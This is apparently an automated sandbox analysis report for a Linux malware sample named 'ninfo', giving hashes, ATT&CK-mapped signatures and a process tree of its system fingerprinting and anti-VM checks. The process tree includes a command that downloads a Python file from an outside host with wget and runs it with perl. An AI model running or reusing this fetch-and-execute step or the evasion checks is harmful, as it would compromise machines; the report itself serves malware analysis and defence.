f0f0c3f43e8537cb43cb932959534f038ec6ee9405aab2303d7da4d0cb34fb00

General

Target

ninfo
Size

2KB
MD5

ecf1fb8301600bf837437e21d17272b1
SHA1

f554f8c16f5beea7ce09348ee1117a8ec6ad9fe2
SHA256

f0f0c3f43e8537cb43cb932959534f038ec6ee9405aab2303d7da4d0cb34fb00
SHA512

c0f7c727c165c61a925b1695c3c0c93d42158831447d915b730dd24370d24b33baa8cf88bf77d581a1c13568414206df09734374ca65c932941ecee4ac69de69

Score

9^/10

antivm

Malware Config

Signatures

Attempts to identify hypervisor via CPU configuration 1 TTPs 4 IoCs
Checks CPU information for indicators that the system is a virtual machine.
antivm

Virtualization/Sandbox Evasion
T1497

Processes:

grepgrepgrepgrep

description ioc process

/proc/cpuinfo /proc/cpuinfo grep
/proc/cpuinfo /proc/cpuinfo grep
/proc/cpuinfo /proc/cpuinfo grep
/proc/cpuinfo /proc/cpuinfo grep
Modifies hosts file 1 IoCs
Adds to hosts file used for mapping hosts to IP addresses.

Processes:

wget

description ioc process

/etc/hosts /etc/hosts wget
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to DNS resolver config file.

Dynamic Resolution
T1568

Processes:

wget

description ioc process

/etc/resolv.conf /etc/resolv.conf wget
Write file to user bin folder 1 TTPs 2 IoCs

Hijack Execution Flow
T1574

Processes:

lsb_release

description ioc process

/usr/bin/lsb_release /usr/bin/lsb_release lsb_release
/usr/bin/pyvenv.cfg /usr/bin/pyvenv.cfg lsb_release
Reads CPU attributes 1 TTPs 1 IoCs

System Information Discovery
T1082

Processes:

free

description ioc process

/sys/devices/system/cpu/online /sys/devices/system/cpu/online free

description	ioc	process
/proc/cpuinfo	/proc/cpuinfo	grep
/proc/cpuinfo	/proc/cpuinfo	grep
/proc/cpuinfo	/proc/cpuinfo	grep
/proc/cpuinfo	/proc/cpuinfo	grep

description	ioc	process
/etc/hosts	/etc/hosts	wget

description	ioc	process
/etc/resolv.conf	/etc/resolv.conf	wget

description	ioc	process
/usr/bin/lsb_release	/usr/bin/lsb_release	lsb_release
/usr/bin/pyvenv.cfg	/usr/bin/pyvenv.cfg	lsb_release

description	ioc	process
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	free

Enumerates kernel/hardware configuration 1 TTPs 55 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

Processes:

lspci

Reads runtime system information 11 IoCs

Reads data from /proc virtual filesystem.

Processes:

sedsedsedsedfreesediddfsed

description	ioc	process
/proc/filesystems	/proc/filesystems	sed
/proc/filesystems	/proc/filesystems	sed
/proc/filesystems	/proc/filesystems	sed
/proc/filesystems	/proc/filesystems	sed
/proc/sys/kernel/osrelease	/proc/sys/kernel/osrelease	free
/proc/meminfo	/proc/meminfo	free
/proc/uptime	/proc/uptime
/proc/filesystems	/proc/filesystems	sed
/proc/filesystems	/proc/filesystems	id
/proc/self/mountinfo	/proc/self/mountinfo	df
/proc/filesystems	/proc/filesystems	sed

Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.

Processes:

ninfo

description ioc process

/tmp/ninfo /tmp/ninfo ninfo

description	ioc	process
/tmp/ninfo	/tmp/ninfo	ninfo

/tmp/ninfo
/tmp/ninfo
1⤵
- Writes file to tmp directory
PID:577

/bin/grep
grep -c "^processor" /proc/cpuinfo
2⤵
- Attempts to identify hypervisor via CPU configuration
PID:583

/usr/bin/lsb_release
lsb_release -si
2⤵
- Write file to user bin folder
PID:598

/bin/uname
uname -a
2⤵
PID:603

/usr/bin/tput
tput bold
2⤵
PID:605

/bin/sleep
sleep 1
2⤵
PID:614

/bin/sleep
sleep 1
2⤵
PID:615

/bin/sleep
sleep 2
2⤵
PID:616

/bin/sleep
sleep 2
2⤵
PID:617

/usr/bin/id
id -u
2⤵
- Reads runtime system information
PID:618

/bin/sleep
sleep 3
2⤵
PID:619

/bin/sleep
sleep 1
2⤵
PID:620

/bin/sleep
sleep 1
2⤵
PID:621

/bin/sleep
sleep 1
2⤵
PID:622

/bin/sleep
sleep 1
2⤵
PID:623

/usr/bin/wget
wget nasapaul.com/v.py
2⤵
- Modifies hosts file
- Writes DNS configuration
PID:624

/usr/bin/perl
perl v.py
2⤵
PID:625

/bin/grep
grep -m 1 "model name" /proc/cpuinfo
1⤵
- Attempts to identify hypervisor via CPU configuration
PID:579

/usr/bin/cut
cut -d: -f2
1⤵
PID:580

/bin/sed
sed -e "s/^ *//"
1⤵
- Reads runtime system information
PID:581

/bin/sed
sed -e "s/\$//"
1⤵
- Reads runtime system information
PID:582

/bin/grep
grep -m 1 stepping /proc/cpuinfo
1⤵
- Attempts to identify hypervisor via CPU configuration
PID:585

/usr/bin/cut
cut -d: -f2
1⤵
PID:586

/bin/sed
sed -e "s/^ *//"
1⤵
- Reads runtime system information
PID:587

/bin/sed
sed -e "s/\$//"
1⤵
- Reads runtime system information
PID:588

/bin/grep
grep -m 1 bogomips /proc/cpuinfo
1⤵
- Attempts to identify hypervisor via CPU configuration
PID:590

/usr/bin/cut
cut -d: -f2
1⤵
PID:591

/bin/sed
sed -e "s/^ *//"
1⤵
- Reads runtime system information
PID:592

/bin/sed
sed -e "s/\$//"
1⤵
- Reads runtime system information
PID:593

/usr/bin/free
free -m
1⤵
- Reads CPU attributes
- Reads runtime system information
PID:600

/bin/grep
grep -oP "\\d+"
1⤵
PID:601

/usr/bin/head
head -n 1
1⤵
PID:602

/usr/bin/lspci
lspci
1⤵
- Enumerates kernel/hardware configuration
PID:607

/bin/grep
grep VGA
1⤵
PID:608

/usr/bin/cut
cut -f5- -d " "
1⤵
PID:609

/bin/df
df -h --total
1⤵
- Reads runtime system information
PID:611

/bin/grep
grep total
1⤵
PID:612

/usr/bin/awk
awk "{ printf \"\" \$2 \"B\\n\\n\" }"
1⤵
PID:613

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Hijack Execution Flow

1

T1574

Privilege Escalation

Hijack Execution Flow

1

T1574

Defense Evasion

Virtualization/Sandbox Evasion

1

T1497

Hijack Execution Flow

1

T1574

Credential Access

Discovery

Virtualization/Sandbox Evasion

1

T1497

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Dynamic Resolution

1

T1568

Impact

description	ioc	process
/sys/bus/pci/devices/0000:00:01.3/vendor	/sys/bus/pci/devices/0000:00:01.3/vendor	lspci
/sys/bus/pci/devices/0000:00:05.0/config	/sys/bus/pci/devices/0000:00:05.0/config	lspci
/sys/bus/pci/devices/0000:00:01.3/config	/sys/bus/pci/devices/0000:00:01.3/config	lspci
/sys/bus/pci/devices/0000:00:01.0/config	/sys/bus/pci/devices/0000:00:01.0/config	lspci
/sys/bus/pci/devices/0000:00:01.0/resource	/sys/bus/pci/devices/0000:00:01.0/resource	lspci
/sys/bus/pci/devices/0000:00:01.0/irq	/sys/bus/pci/devices/0000:00:01.0/irq	lspci
/sys/bus/pci/devices/0000:00:04.0/vendor	/sys/bus/pci/devices/0000:00:04.0/vendor	lspci
/sys/bus/pci/devices/0000:00:06.0/resource	/sys/bus/pci/devices/0000:00:06.0/resource	lspci
/sys/bus/pci/devices/0000:00:06.0/class	/sys/bus/pci/devices/0000:00:06.0/class	lspci
/sys/bus/pci/devices/0000:00:01.1/resource	/sys/bus/pci/devices/0000:00:01.1/resource	lspci
/sys/bus/pci/devices/0000:00:06.0/device	/sys/bus/pci/devices/0000:00:06.0/device	lspci
/sys/bus/pci/devices/0000:00:01.1/config	/sys/bus/pci/devices/0000:00:01.1/config	lspci
/sys/bus/pci/devices/0000:00:04.0/irq	/sys/bus/pci/devices/0000:00:04.0/irq	lspci
/sys/bus/pci/devices/0000:00:03.0/resource	/sys/bus/pci/devices/0000:00:03.0/resource	lspci
/sys/bus/pci/devices/0000:00:02.0/irq	/sys/bus/pci/devices/0000:00:02.0/irq	lspci
/sys/bus/pci/devices/0000:00:02.0/device	/sys/bus/pci/devices/0000:00:02.0/device	lspci
/sys/bus/pci/devices/0000:00:05.0/class	/sys/bus/pci/devices/0000:00:05.0/class	lspci
/sys/bus/pci/devices/0000:00:00.0/resource	/sys/bus/pci/devices/0000:00:00.0/resource	lspci
/sys/bus/pci/devices/0000:00:06.0/irq	/sys/bus/pci/devices/0000:00:06.0/irq	lspci
/sys/bus/pci/devices/0000:00:06.0/vendor	/sys/bus/pci/devices/0000:00:06.0/vendor	lspci
/sys/bus/pci/devices/0000:00:00.0/vendor	/sys/bus/pci/devices/0000:00:00.0/vendor	lspci
/sys/bus/pci/devices/0000:00:01.3/class	/sys/bus/pci/devices/0000:00:01.3/class	lspci
/sys/bus/pci/devices/0000:00:03.0/irq	/sys/bus/pci/devices/0000:00:03.0/irq	lspci
/sys/bus/pci/devices/0000:00:03.0/vendor	/sys/bus/pci/devices/0000:00:03.0/vendor	lspci
/sys/bus/pci/devices/0000:00:04.0/device	/sys/bus/pci/devices/0000:00:04.0/device	lspci
/sys/bus/pci/devices/0000:00:01.1/device	/sys/bus/pci/devices/0000:00:01.1/device	lspci
/sys/bus/pci/devices/0000:00:02.0/resource	/sys/bus/pci/devices/0000:00:02.0/resource	lspci
/sys/bus/pci/devices/0000:00:01.3/irq	/sys/bus/pci/devices/0000:00:01.3/irq	lspci
/sys/bus/pci/devices/0000:00:01.1/vendor	/sys/bus/pci/devices/0000:00:01.1/vendor	lspci
/sys/bus/pci/devices/0000:00:00.0/class	/sys/bus/pci/devices/0000:00:00.0/class	lspci
/sys/bus/pci/devices/0000:00:01.3/device	/sys/bus/pci/devices/0000:00:01.3/device	lspci
/sys/bus/pci/devices/0000:00:01.1/class	/sys/bus/pci/devices/0000:00:01.1/class	lspci
/sys/bus/pci/devices/0000:00:02.0/config	/sys/bus/pci/devices/0000:00:02.0/config	lspci
/sys/bus/pci/devices/0000:00:00.0/device	/sys/bus/pci/devices/0000:00:00.0/device	lspci
/sys/bus/pci/devices/0000:00:01.1/irq	/sys/bus/pci/devices/0000:00:01.1/irq	lspci
/sys/bus/pci/devices/0000:00:05.0/vendor	/sys/bus/pci/devices/0000:00:05.0/vendor	lspci
/sys/bus/pci/devices/0000:00:03.0/config	/sys/bus/pci/devices/0000:00:03.0/config	lspci
/sys/bus/pci/devices/0000:00:04.0/resource	/sys/bus/pci/devices/0000:00:04.0/resource	lspci
/sys/bus/pci/devices/0000:00:04.0/class	/sys/bus/pci/devices/0000:00:04.0/class	lspci
/sys/bus/pci/devices/0000:00:02.0/vendor	/sys/bus/pci/devices/0000:00:02.0/vendor	lspci
/sys/bus/pci/devices/0000:00:05.0/irq	/sys/bus/pci/devices/0000:00:05.0/irq	lspci
/sys/bus/pci/devices/0000:00:06.0/config	/sys/bus/pci/devices/0000:00:06.0/config	lspci
/sys/bus/pci/devices	/sys/bus/pci/devices	lspci
/sys/bus/pci/devices/0000:00:01.0/vendor	/sys/bus/pci/devices/0000:00:01.0/vendor	lspci
/sys/bus/pci/devices/0000:00:04.0/config	/sys/bus/pci/devices/0000:00:04.0/config	lspci
/sys/bus/pci/devices/0000:00:01.0/class	/sys/bus/pci/devices/0000:00:01.0/class	lspci
/sys/bus/pci/devices/0000:00:01.3/resource	/sys/bus/pci/devices/0000:00:01.3/resource	lspci
/sys/bus/pci/devices/0000:00:03.0/class	/sys/bus/pci/devices/0000:00:03.0/class	lspci
/sys/bus/pci/devices/0000:00:00.0/config	/sys/bus/pci/devices/0000:00:00.0/config	lspci
/sys/bus/pci/devices/0000:00:01.0/device	/sys/bus/pci/devices/0000:00:01.0/device	lspci
/sys/bus/pci/devices/0000:00:03.0/device	/sys/bus/pci/devices/0000:00:03.0/device	lspci
/sys/bus/pci/devices/0000:00:05.0/resource	/sys/bus/pci/devices/0000:00:05.0/resource	lspci
/sys/bus/pci/devices/0000:00:05.0/device	/sys/bus/pci/devices/0000:00:05.0/device	lspci
/sys/bus/pci/devices/0000:00:00.0/irq	/sys/bus/pci/devices/0000:00:00.0/irq	lspci
/sys/bus/pci/devices/0000:00:02.0/class	/sys/bus/pci/devices/0000:00:02.0/class	lspci

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads